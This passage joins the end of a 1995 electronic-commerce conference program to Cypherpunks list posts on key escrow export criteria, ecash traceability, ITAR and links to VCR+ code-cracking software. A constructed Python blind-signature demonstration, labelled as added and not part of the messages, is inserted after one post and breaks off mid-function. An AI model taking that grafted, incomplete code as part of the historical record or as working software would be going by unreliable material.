     Prof. Michael  Froomkin, University of Miami School of Law
     Jeff  Greiveldinger, US Department of Justice, Criminal Div.
     Frank W Sudia, Bankers Trust Company

Session 6
Comparing Critical Cryptographic Algorithms, Protocols,
and Standards to Enable Secure Electronic Commerce
   SPEAKERS:
     Peter  Landrock, Ph.D., CRYPTOMATHIC
     Ron  Rivest, Massachusetts Institute of Technology
     Miles E Smid, National Institute of Standards & Tech.

Session 7
Export Controls & Transborder Data Flows:
Is Secure Electronic Commerce in Jeopardy?
   SPEAKERS:
     James  Bidzos, RSA Data Security
     Renee H Danckwerth, Export Consultant


Session 8
'Certificates-R-US':
Trust Models and the Developing Secure Information Infrastructure
   SPEAKERS:
     Warwick  Ford, Bell-Northern Research
     Sead  Muftic, COST Computer Security Technologies
     Peter  Williams, Verisign

Session 9
Professional Accreditation and Certification -
The New Frontier in 'Remote Trust'
   SPEAKERS:
     Richard C Koenig, Int'l Info. Sys. Security Cert. Consort.
     Alan M Schwartz, Esq., American Bar Association

Session 10
Looking into the Crystal Ball: Certificates Revisited
   SPEAKERS:
     Web  Augustine, VeriSign, Inc.
     Warwick  Ford, Bell-Northern Research
     Hoyt  Kesterson II, Bull Worldwide Information Systems

-------------------------------------------
TRACK - C
LEGAL ASPECTS OF SECURE ELECTRONIC COMMERCE
-------------------------------------------
Session 1
Do Criminal Laws Really Protect Electronic Commerce?
   SPEAKERS:
     Scott  Charney, Esq., US Department of Justice
     William J Cook, Brinks, et al.
     Richard A Ress, Federal Bureau of Investigation

Session 2
Who Owns the Information, Standards, Certificates and Cryptographic Keys?
   SPEAKERS:
     Peter  Harter, National Public Telecomputing Network
     David W Maher, Esq., Sonnenschein Nath & Rosenthal
     James  Powers, Esq., Shulman, Rogers et. al

Session 3
Consumers on the Net - Fairness, Conspicuousness, Notice, and Reliance
   SPEAKERS:
     Nessa Eileen Feddis, Esq., Government Relations/Retail Banking
     Ray  Nimmer, Esq., Weil, Gotshal & Manges

Session 4
Electronic Licensing and Distribution of Digital Content:
Downloading for Liability?
   SPEAKERS:
     James C McKay, Jr., Office of the Corporation Counsel, D.C.
     Thomas J Smedinghoff, Esq., McBride Baker & Coles
     Mark  Traphagen, Software Publishers Association.

Session 5
Insuring Electronic Commerce Transactions and Infrastructure
   SPEAKERS:
     Andrew  Cockrane, Alexander & Alexander
     Norman R Nelson, New York Clearing House Association

Session 6
Auditing a Third Party/Value Added Network or
Certification Authority (and Its Implications)
   SPEAKERS:
     Charles H LeGrand, CIA, Institute of Internal Auditors
     John  Stelzer, COMMERCE:Institute

Session 7
Electronic Recordkeeping -
What to Save, When and How to Save It, and for How Long
   SPEAKERS:
     Lynn  Casimir, Esq., Internal Revenue Service
     Celia  Gabrysh, Esq., Internal Revenue Service
     Claude  Perreault, Chambre des notaires du Quebec

Session 8
Disaster and Contingency Planning Services: What is Needed for EC and 
Certification Authorities
   SPEAKERS:
     Dain Gary, Morgan Stanley
     Ake Nilson, Marinade Limited
     Helena  Roine-Taylor, The Finnish Data Communication Assoc. FINPRO
     David Solo, Bolt, Beranek and Newman

Session 9
General Counsel's Forum on Computer-Based Trade
   SPEAKERS:
     Robert W Barger, Esq., AT&T
     Bruce  Hunter, Esq., General Electric Information Services
     Ellen  Kirsh, Esq., America On Line

Session 10
An Audit Model for Your Electronic Commerce Infrastructure
   SPEAKERS:
     Gerald R Bielfeldt, NationsBank
     Phillip  Oddo, Ciba-Geigy
     Horton  Sorkin, Ph.D., Howard University


------------------------------
TRACK - D
INFRASTRUCTURAL CONSIDERATIONS
------------------------------
Session 1
Securely Shopping on the Web: New Paradigms, Protocols and Opportunities
   SPEAKERS:
     Jeff Hilt, VISA International
     Todd Ostrander, Egghead Software

Session 2
What can Trusted Third Parties and Certification
Authorities Learn from the Financial Clearinghouses
   SPEAKERS:
     Carol  Barrett, Federal Reserve Bank of New York
     Bill  Nelson, National Automated Clearinghouse Associa
     Norman R Nelson, New York Clearing House Association

Session 3
Electronically 'Gluing' Computer-based Records
   SPEAKERS:
     Phillip  Hallam-Baker, Massachusetts Institute of Technology
     Allan M Shiffman, Terisa Systems, Inc.

Session 4
Global Registries for Secure Electronic Commerce
   SPEAKERS:
     Jonathan Allen, Barum Computer Consultants
     Michel Peereman, Federation Nationale des Chambres
     Peter Robinson, US Council for International Business

Session 5
Computer-based Negotiability: What is Needed to Make it Work
   SPEAKERS:
     Harold S Burman, Esq., Office of the Legal Advisor
     James E Byrne, James Mason University Law School
     Ake Nilson, Marinade Limited

Session 6
Time/Date Stamping of Digital Information: Necessities & Options
   SPEAKERS:
     Richard  Rothwell, United States Postal Service
     Scott  Stornetta, Surety Technologies, Inc.

Session 7
Will Healthcare-related Electronic Commerce
Require Special Controls and Secure Infrastructures?
   SPEAKERS:
     Kathleen  Frawley, J.D., M.S., R.R.A, AHIMA
     Daniel J O'Shea, National Computer Claims Service

Session 8
The Role of Notaries in Securing Computer-Based Commerce: the CyberNotary(sm)
   SPEAKERS:
     Theodore S Barassi, Esq., US Council for International Business
     Mario Miccoli, International Union of Latin Notaries

Session 9
Electronic Cash and Novel Electronic Commerce Payments Systems
   SPEAKERS:
     Nessa Eileen Feddis, Esq., Government Relations/Retail Banking
     Ron Rivest, Massachusetts Institute of Technology
     Marvin Sirbu, Carnegie-Mellon University

Session 10
Why does Everyone Want to be a Trusted Third
Party/Certification Authority (at Least Initially)?
   SPEAKERS:
     Sead  Muftic, COST Computer Security Technologies
     Stratton D Sclavos, VeriSign, Inc.


-----------------------------------------------------------------
TO REGISTER:
-------------

Price: $550.00 (U.S.)

Name:
Title:
First Name for Badge:
Company/Organization:
Address:
City/State/Prov/Zip/Postal code:
Country:
Telephone:
Fax:
E-Mail:

Check One:
==========
[ ] I am Mailing a check in the amount of $______
[ ] I wish to charge this to a credit card (fax or mail only)
     [ ] American Express
     [ ] Visa
     [ ] MasterCard

     Card Number:
     Expiration Date:
     Name on Card:
     Signature (fax or mail):

-----------------------------------------------------------------
HOTEL RESERVATIONS:
	A special conference rate of $129 has been arranged
	for our attendees. To make arrangements, please call
	the Hyatt Regency Bethesda at (301) 657-1234

	Hyatt Regency Bethesda
	One Bethesda Metro Center
	Bethesda, MD 20814
-----------------------------------------------------------------

For more information or a complete program brochure and schedule,
contact the conference coordinators as shown below:


HOW TO CONTACT US
=================
E-Mail:  wec@multicorp.com
Phone: (214) 516-4900
Fax: (214) 424-0562

Mail: Worldwide Electronic Commerce
      PO Box 743485
      Dallas, TX 75374

===============================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Tue, 5 Sep 95 10:43:21 PDT
To: cypherpunks@toad.com
Subject: A recent article on Electronic Commerce
Message-ID: <Pine.BSI.3.91.950905121250.3370A-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain




In the August 28, 1995 issue of Communications Week, the editor
Mitch Irsfield briefly discusses electronic checking, and the
joint venture between Sun, BBN, IBM, et al.  He also references
an article explaining the venture on Page 5 of the same issue.

I dropped him a quick note thanking him for writing a non-hysterical
article on cryptography, and also briefly mentioned that some
of us would prefer electronic cash to electronic checking.  

Since part of being a cypherpunk is political, I'd like to encourage
everyone to write a quick e-mail which expresses your own views 
to Mr. Irsfield (678-7017@mcimail.com).  Speaking of talking to
the 'public' about crypto-cash, we really need a meme of our own.
Just as The Other Side invokes the specters of terrorism and
child pornography, we need something like 'traceable transactions',
'government approved checking', 'uncle sam's clearing house', or
'irs approved bill payments.'  Obviously the creative types on
the list can come up with much better.   But, I digress.

The Page 5 article doesn't go into much detail, but says in essence
that the system is an api layer and a smart card.  In the cases
of larger corporations, they may require a separate processor.
This says 'encryption in hardware' to me.  Gee, wonder if someone
found a use for all those useless tessera cards after all? :-)



David Neal <dneal@usis.com> - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant. "...you have a personal responsibility 
to be pro-active in the defense of your own civil liberties." - S. McCandlish





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 12:41:48 PDT
To: Bill Stewart <pfarrell@netcom.com
Subject: Re: Acceptable NIS&T restrictions
Message-ID: <v02120d02ac725e647251@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:20 9/4/95, Bill Stewart wrote:
[...]

>For Commercial Key Escrow, or commercial key-backup services, the criteria are
>"whoever can be trusted to provide the services the customers want".
>In this case, of course, the service most customers want is to be left alone,
>or, failing that, to have the government's Master Key system provide minimal
>risk
>to the security of the actual transactions - 64 bit keys are not enough
>security
>for any high-valued financial transactions, though they may suffice for
>credit cards.
>One required characteristic would appear to be either sufficiently deep pockets
>to collect judgements for violations of trust or a sufficiently high
>reputation that
>violations of trust are not expected.

It seems obvious to me that prospective key escrow agents would be exempt
from all liability for damages caused by releasing a key, except in cases of
gross negligence. Gross negligence being defined as giving a key to a
person who explicitly states that they intend to use it for illegal
purposes.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 12:43:09 PDT
To: Black Unicorn <cypherpunks@toad.com
Subject: Re: Forgery, bills, and the Four Horsemen  (Articles and Comment)
Message-ID: <v02120d03ac7260cb02e3@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:44 9/4/95, Black Unicorn wrote:
[...]

>3.  The corruption of e-cash to further the above.
>
>If the government is disturbed by the laundering of money enough
>to actually print, or even propose printing, two kinds of
>currency, how will they respond to untraceable, unaccountable and
>infinitely liquid e-cash?  I think the answer is in past behavior:
>e-cash will be linked to the four horsemen and subjected to
>rigorous reporting requirements- systems which are true e-cash
>will be banned.

This is unnecessary, since there is no "true" ecash. DigiCash's ecash in
its current form, the only version David Chaum is willing to license, is
fully traceable. Popular Cypherpunk myths notwithstanding.

First, the recipient of funds is non-anonymous by design. Second, any payer
can trivially make the recipient of an ecash note known by revealing the
blinding factor. For purposes of law enforcement, DigiCash's ecash is no
more secure than if the (insert horseman here) billed his fees to a credit
card.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 13:38:05 PDT
To: Andrew Loewenstern <hallam@w3.org
Subject: Re: Emergency File Wipe Algorithim
Message-ID: <v02120d05ac7269b71b65@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:44 9/5/95, Andrew Loewenstern wrote:

>Of course, your data must be worth quite a pretty penny for an attacker to
>attempt to recover data from the oxides on the cells in your RAM.

Didn't I just read a day ago that Robert Morris (ex-NSA) cautioned that one
should never underestimate the time and effort an opponent is willing to
put into recovering your data?

May I also point out that the rules of economics do not apply to the
federal government, since it insists - quite successfully - on having a
monopoly on using lethal force to extract arbitrarily large amounts from
hundreds of millions of working Americans?

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Tue, 5 Sep 95 13:54:02 PDT
To: cypherpunks@toad.com
Subject: Another Son of Clipper discussion paper
Message-ID: <199509052053.NAA01226@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain


I sent along two discussion papers for tomorrow's NIST session on the
revised plans for GAK last week.  Here's the third.

	Jim Gillogly
	Hevensday, 14 Halimath S.R. 1995, 20:49
-----------------------------------------------------------------------------

Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #3

                 Export Criteria Discussion Draft --
                64-bit Software Key Escrow Encryption

As discussed at the SPA/AEA meeting on August 17, 1995, the
Administration is willing to allow the export of software
encryption provided that the products use algorithms with key
space that does not exceed 64 bits and the key(s) required to
decrypt messages/files are escrowed with approved escrow agents.
On the same date, the September 6-7 key escrow issues meeting at
NIST was also announced.  The two principal topics at the meeting
will be:  1) discussion of issues of exportability of 64-bit
software key escrow encryption and 2) desirable characteristics
for key escrow agents.

In order to help make most productive use of the limited time
available at the upcoming meeting and to better focus
deliberation, the following criteria are being distributed for
discussion purposes.  Since it is important that final criteria
be clear, straightforward, consistent, and implementable, please
review these draft criteria and be prepared to discuss
how they may be refined and made more specific.

                          --- Draft Export Criteria ---
for Software Key Escrow Encryption

Software key escrow encryption products meeting the following
criteria will be granted special export licensing treatment
similar to that afforded other mass-market software products with
encryption.

1.    The product will use an unclassified encryption algorithm
      (e.g., DES, RC4) with a key length not to exceed 64 bits.

2.    The product shall be designed to prevent multiple encryption
      (e.g., triple-DES).

3.    The key required to decrypt each message or file shall be
      accessible through a key escrow mechanism in the product,
      and such keys will be escrowed during manufacture in
      accordance with #10.  If such keys are not escrowed during
      manufacture, the product shall be inoperable until the key
      is escrowed in accordance with #10.

4.    The key escrow mechanism shall be designed to include with
      each encrypted message or file, in a format accessible by
      authorized entities, the identity of the key escrow
      agent(s), and information sufficient for the escrow agent(s)
      to identify the key or key components required to decrypt
      that message.

5.    The product shall be resistant to any alteration that would
      disable or circumvent the key escrow mechanism, to include
      being designed so that the key escrow mechanism cannot be
      disabled by a static patch, (i.e., the replacement of a
      block of code by a modified block).

6.    The product shall not decrypt messages or files encrypted by
      non-escrowed products, including products whose key escrow
      mechanisms have been altered or disabled.

7.    The key escrow mechanism allows access to a user's encrypted
      information regardless of whether that user is the sender or
      the intended recipient of the encrypted information.

8.    The key escrow mechanism shall not require repeated
      involvement by the escrow agents for the recovery of
      multiple decryption keys during the period of authorized
      access.

9.    In the event any such product is or may be available in the
      United States, each production copy of the software shall
      either have a unique key required for decrypting messages or
      files that is escrowed in accordance with #10, or have the
      capability for its escrow mechanism to be rekeyed and any
      new key to be escrowed in accordance with #10.

10.   The product shall accept escrow of its key(s) only with
      escrow agents certified by the U.S. Government or by foreign
      governments with which the U.S. Government has formal
      agreements consistent with U.S. law enforcement and national
      security requirements.

Note: Software products incorporating additional encryption
methods other than key escrow encryption methods will be
evaluated for export on the basis of each encryption method
included, as is already the case with existing products.
Accordingly, these criteria apply only to the key escrow
encryption method incorporated by a software product, and not to
other non-escrowed encryption methods it may incorporate.  For
instance, non-escrowed encryption using a key length of 40 bits
or less will continue to be exportable under existing export
regulations.
                                - - -
Please also review discussion paper #1 (distributed earlier),
which raises a number of issues involving exportability criteria
and how exportable products could be designed.  Discussion paper
#2 (also previously distributed) presents questions involving key
escrow agents.

Note:  These issues will be discussed at the Key Escrow Issues
Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at
the National Institute of Standards and Technology (Gaithersburg,
Maryland).  The meeting will be open to the public, although
seating is limited.  Advance registration is requested, please
contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-
mail: carlton@micf.nist.gov.

9/1/95
-----------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Tue, 5 Sep 95 13:57:43 PDT
To: cypherpunks@toad.com
Subject: approx of bignum^rational
Message-ID: <v02120d01ac7277823b9e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone have a good method for approximating bignums raised to
rational exponents in the interval [0,1]?

Thanks,

Douglas Barnes
Electric Communities






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Tue, 5 Sep 95 11:22:45 PDT
To: cypherpunks@toad.com
Subject: [trei@process.com:       Re: VCRPLUS Huffman code]
Message-ID: <199509051806.OAA03038@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


    ================= Begin forwarded message =================

    From: trei@process.com (Peter Trei)
    To: miniters@citadel.edu, cypherpunks@toad.com
    Subject:       Re: VCRPLUS Huffman code
    Date: Tue, 05 Sep

    
    
    > Has anyone worked out the VCRPLUS code?
    
    It was partially broken a few years ago, and the results published in
    Cryptologia. I have a xerox in a carton somewhere. 
    
    The break was for codes up to 4 or 5 digits long, if I recall - this covers
    most of the major timeslots on the main stations. Longer codes
    cover odd timeslots on less popular stations.
    
    Code which implemented this partial crack was published on the net,
    and the VCR+ people got very upset about it - apparently they make
    money selling the codes to TV Guide and newspapers. It's protected
    as a trade secret, not a patent.
    
    It used a combination of lookup tables and Huffman codes, and
    included a certain amount of obfuscation to resist cracking.
    
    Peter
    
    
    Peter Trei
    Senior Software Engineer
    Purveyor Development Team                                
    Process Software Corporation
    http://www.process.com
    trei@process.com
    
    

--
Tobin Fricke (aka LightRay)       The Digital Forest BBS (714)586-6142
dr261@kanga.ins.cwru.edu          KE6WHF Amateur Radio, 1:103/925 fido




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Tue, 5 Sep 95 11:11:08 PDT
To: cypherpunks@toad.com
Subject: Re: VCRPLUS Huffman code
In-Reply-To: <199509042328.TAA02676@nic.wat.hookup.net>
Message-ID: <Pine.LNX.3.91.950905140509.281A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 4 Sep 1995 bplib@nic.wat.hookup.net wrote:

> I too would be interested in the VCRPlus code. Has anyone broken it?
> Tim Philp
> 
> 
> 

You can get the source code to VCR+ encoding and decoding at
ftp://sable.ox.ac.uk/pub/crypto/cryptanalysis/vcr+.shar.gz





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 14:48:13 PDT
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Emergency File Wipe Algorithim
Message-ID: <v02120d04ac7283767710@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:20 9/5/95, Andrew Loewenstern wrote:
[...]
>andrew
>(wonders how many readers will take their keyboards apart to look for radio
>transmitters)

Been there. Done that. Hmm, come to think of it, it's about time for
another check.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 5 Sep 95 11:53:33 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <9509051853.AA21783@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> >I did a distributed scheme for something else that had two levels, a master
> >and a group of slaves.  Only the slaves talked to the master.  For this 
> >effort I think a variation of the idea would be better.  Have all of the
> >brutes contact the master, who will, in the first transaction assign them
> >to the next slave in a round-robin fashion.

> Why not just have the brutes pick a slave at random?  Of course, you need
> to give them a complete list of slaves to choose from.  But then the only
> difference between the master and the slaves will be that the master
> doesn't get any keyspace (it's got it all to begin with) and doesn't
> report any results upward.

This is starting to sound like alt.sex.bondage....


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Tue, 5 Sep 95 15:04:59 PDT
To: cypherpunks@toad.com
Subject: Son of Clipper (commentary)
Message-ID: <199509052204.PAA01423@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain


I didn't want to mix my comments with the recent discussion paper I sent
along, so here they are separately.  Please refer back to my last msg to
see the points I'm bitching about.

It's a depressingly restrictive list of things to require for software
escrow encryption.  I can only conclude that they're not serious.  Clipper
itself fails to meet many of them, including (I think) #1, #2, #5, and #6.
Rumor has it that Clipper does not meet #9 either -- at Crypto '95
somebody in the Key Escrow session said many government Clipper keys are
not escrowed, and somebody in the back spoke up and said he owned such a
chip.  By the way, Moti Yung (noted crypto guy at IBM Yorktown Heights)
presented more breaks in Clipper's protocols like those Matt Blaze found,
and pointed out some aspects of Matt's break that he thinks make it more
important than previously thought.

Other things that bother me about the list:

#1: If it's escrowed, there should be no need to limit the key length unless
    somebody's planning to cheat.

#3: This rules out the possibility of escrowing individual session keys to
    limit the access of LE to sessions they are entitled by law to intercept.

#5: Care to tell us how to create software that can't be patched?
    This is one that's been played in the marketplace and has lost.  The
    battle between copy protectors and crackers has been decided in favor
    of the crackers: legitimate users largely refuse to buy packages that
    are too messy to deal with (e.g. they leave hidden files all over the
    disk, which may interfere with backups or other programs) or that use
    special purpose hardware (e.g. dongles that eat up a printer port).

    This one's a loser, I think.

#6: This is clearly a research issue.  Several speakers (even pro-GAK) at
    Crypto '95 said the policy decisions are being made before the
    research has been done.  The protocols and system specifications are
    key here, and it's not obvious how this criterion can be met.  It's
    not obviously impossible, but it certainly hasn't been solved in Clipper.

#7: One of the Crypto '95 attacks on the Clipper protocol makes use of
    this misfeature of Clipper.  It allows a broadening of the net of
    captured keys so that many more unauthorized messages may be read.

#8: See #3 above -- let's wait on the policy decision until we have a policy
    debate.  A mandated compromise is an oxymoron.  I (for one) would prefer
    to see much more limited keys (like session keys) if Congress decides
    that the right to privacy is not infringed by these technologies.

There's nothing in here that specifically excludes dividing your keys
among multiple escrow agents; I assume this is still an open issue,
or that it goes without saying (one way or the other).

#3 and #6 make it impossible to prevent LE from reading messages from
before or after their legally authorized window.  This is clearly broken.

Again, this appears to be trying to put all the power in the hands of LE to
the detriment of the people.  It's advertised as a compromise, but I see
nothing gained over Clipper I.  The only differences appear to be that the
escrow agent(s) may be private instead of government, and the algorithms may
be something other than SKIPJACK as long as they are at least 16 bits
weaker as well as being known algorithms.

It also doesn't address the main problem with Clipper I: that it wouldn't
work, since (like Clipper I) it will catch only crooks who are smart enough
to encrypt but stupid enough to encrypt with a system they (should) know LE
can read -- probably a null set.  If, on the other hand, this is made
mandatory for encrypted transmissions, it will create a new and unnecessary
class of criminals, probably including myself (though I won't promise to
break any laws at this point).

This really burns me up.  What do they think they're doing here?  Am I
missing a big piece of it?

	Jim Gillogly
	Hevensday, 14 Halimath S.R. 1995, 22:02




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <tunny@Inference.COM>
Date: Tue, 5 Sep 95 15:13:33 PDT
To: Peter Trei <trei@process.com>
Subject: RE: VCRPLUS Huffman code
Message-ID: <304CCA55@smtp-pc>
MIME-Version: 1.0
Content-Type: text/plain



>On Tue, 5 Sep 1995, Peter Trei wrote:
>
>>
>> > Has anyone worked out the VCRPLUS code?
>>
>
>  <chomp>
>
>> Code which implemented this partial crack was published on the net,
>> and the VCR+ people got very upset about it - apparently they make
>
>  I believe the code is in the cookbook archive at ftp.ee.ualberta.ca,
>but when I just tried to confirm I got timeouts.
>
>   Brian

Among many other places, you can get this off my Web page, in:
 http://www.inference.com/~tunny/crypto/primer.html

 - Tunny
______________________________________________________________________
James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
tunny@Inference.com    | <--finger for key  36 07 D9 33 3D 32 53 9C
======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iagoldbe@csclub.uwaterloo.ca>
Date: Tue, 5 Sep 95 12:46:19 PDT
To: cypherpunks@toad.com
Subject: Re: Wearing RSA shirt to school
Message-ID: <199509051946.PAA03230@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


OK, I'm confused.  Is it or is it not legal to disclose cryptology to
a foreigner?  T.C.May (I think it was; sorry if I misremember this) posted
a couple of days ago that it _was_ legal (citing that textbooks are not
stopped from being published internationally).

Perhaps this is just because the publishers of these texts never applied
for an export license (maybe)?  I was reading Bernstein vs. US Dept. of
State, et al. (http://pgp.ai.mit.edu/~bal/legal/complaint-950221.html),
and found this:


G.  RESULT OF DEFENDANTS' REJECTION OF PLAINTIFF'S CJ REQUEST
    71.  Plaintiff's scientific paper, algorithm and computer program are
speech protected by the First Amendment to the United States Constitution.
Thus, by rejecting Plaintiff's CJ Request, Defendants have determined that
these items are "defense articles or defense services" which may not be
exported without submitting to the above-described prior restraints.  Since
Defendants define "export" to include disclosing or transferring cryptology
to a foreign person anywhere in the world, including within the United
States, Plaintiff is informed and believes and therefore alleges that he is
required by law to obtain a license to publish or publicly discuss any of
the Items whether within or outside the United States.
    72.  Plaintiff is presently unable to publish his scientific paper,
algorithm or computer program within or outside the United States.  The
only reason preventing publication is the threat of prosecution for an
illegal export if he does so without a license.
    73.  To this date, Plaintiff has not received a response to his
appeal or a license to publish his paper, algorithm, or computer program
and as a result, he has not published the Items.


So it seems to me (at least according to the Plaintiff (EFF, I guess)),
that the ITAR regulations _do_ restrict publication and public discussion
of cryptology.

   - Ian "and why is Canada considered part of the US for this?"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Tue, 5 Sep 95 16:02:55 PDT
To: cypherpunks@toad.com
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <Pine.SUN.3.91.950904235841.8362A-100000@access2.digex.net>
Message-ID: <199509052300.QAA21504@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> > 
> > Here's a prediction:  within one year, we will see the advent of Micro$oft's
> > "Not So Bad Privacy".  It'll be a secret algorithm with either GAK done by
> > Micro$oft itself, or a flat-out trap door.  ANY communications with a 
> > Windoze box or network will have to use it, or lose the market.
> 
Black Unicorn wrote:
> 
> It's here already.
> It's called "lotus notes."
> 
So what form of GAK or trap-door does lotus notes contain?

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 5 Sep 95 16:11:53 PDT
To: cypherpunks@toad.com
Subject: Re: Forgery, bills, and the Four Horsemen  (Articles and Comment)
Message-ID: <199509052310.QAA10027@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: shamrock@netcom.com (Lucky Green)
> This is unnecessary, since there is no "true" ecash. DigiCash's ecash in
> its current form, the only version David Chaum is willing to license, is
> fully traceable. Popular Cypherpunk myths notwithstanding.
> 
> First, the recipient of funds is non-anonymous by design. Second, any payer
> can trivially make the recipient of an ecash note known by revealing the
> blinding factor. For purposes of law enforcement, DigiCash's ecash is no
> more secure than if the (insert horseman here) billed his fees to a credit
> card.

This is not completely correct; there is a degree of anonymity in
DigiCash's ecash.  That is anonymity of how a person spends his money.
Neither the bank nor the payor is in a position to learn who or where a
particular piece of ecash comes from (assuming that anonymous
communication means are used).

This is not trivial anonymity.  IMO the greatest privacy threat posed by
credit cards is exactly this, the tracking of spending information and
patterns.  With credit card payments a great deal of information can be
learned by the credit card company about what I do.  With ecash almost no
information is learned, only the raw amounts I spend.  And if I occasionally
make payments to myself even that is blurred.

Ecash is not all that we might hope it could be but it is more than a
myth that it allows untraceable transactions.

Hal
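Both claims in this exchange (Lucky Green: a payer can expose the recipient by revealing the blinding factor; Hal: the bank cannot tell who spent a given note) can be checked on a textbook RSA blind-signature note. This is an added example, not part of either message and not DigiCash's code or protocol; the toy key, the account names, the serial strings and the assumption that the payee deposits each note at the issuing bank are all constructed for illustration.

```python
import hashlib
import math
import secrets

# Toy bank key, constructed for this example: two Mersenne primes, far too
# small for real use.
P, Q = 2**31 - 1, 2**61 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))    # bank's private signing exponent


def note_hash(serial: bytes) -> int:
    """Hash a note serial number into the RSA group."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


class Payer:
    def __init__(self, account: str):
        self.account = account
        self.factors = {}            # serial -> blinding factor r (kept secret)

    def blind(self, serial: bytes) -> int:
        while True:                  # r must be invertible mod N
            r = secrets.randbelow(N - 2) + 2
            if math.gcd(r, N) == 1:
                break
        self.factors[serial] = r
        return note_hash(serial) * pow(r, E, N) % N

    def unblind(self, serial: bytes, blind_sig: int) -> int:
        return blind_sig * pow(self.factors[serial], -1, N) % N


class Bank:
    def __init__(self):
        self.withdrawals = []        # (account, blinded value): all the bank sees
        self.deposits = {}           # serial -> depositing account

    def withdraw(self, account: str, blinded: int) -> int:
        self.withdrawals.append((account, blinded))
        return pow(blinded, D, N)    # signs without ever seeing the serial

    def deposit(self, account: str, serial: bytes, sig: int) -> bool:
        if pow(sig, E, N) != note_hash(serial) or serial in self.deposits:
            return False             # bad signature or double spend
        self.deposits[serial] = account
        return True

    def accounts_consistent_with(self, serial: bytes) -> list:
        """Hal's point: for a deposited note, every logged withdrawal has
        some blinding factor that explains it, so the log names no payer."""
        inv = pow(note_hash(serial), -1, N)
        out = []
        for account, blinded in self.withdrawals:
            r = pow(blinded * inv % N, D, N)   # factor that would fit
            if note_hash(serial) * pow(r, E, N) % N == blinded:
                out.append(account)
        return out

    def trace_payee(self, payer_account: str, serial: bytes, r: int):
        """Lucky Green's point: the payer discloses (serial, r); the bank
        confirms the link to its withdrawal log and names the depositor."""
        claimed = note_hash(serial) * pow(r, E, N) % N
        if (payer_account, claimed) not in self.withdrawals:
            return None
        return self.deposits.get(serial)


def run_scenario() -> dict:
    bank, alice, carol = Bank(), Payer("alice"), Payer("carol")
    serial_a, serial_c = b"note-0001 (constructed)", b"note-0002 (constructed)"
    sig_a = alice.unblind(serial_a, bank.withdraw("alice", alice.blind(serial_a)))
    carol.unblind(serial_c, bank.withdraw("carol", carol.blind(serial_c)))
    accepted = bank.deposit("bob", serial_a, sig_a)   # alice paid bob
    return {
        "accepted": accepted,
        "double_spend": bank.deposit("mallory", serial_a, sig_a),
        "possible_payers": bank.accounts_consistent_with(serial_a),
        "payee_from_alice": bank.trace_payee(
            "alice", serial_a, alice.factors[serial_a]),
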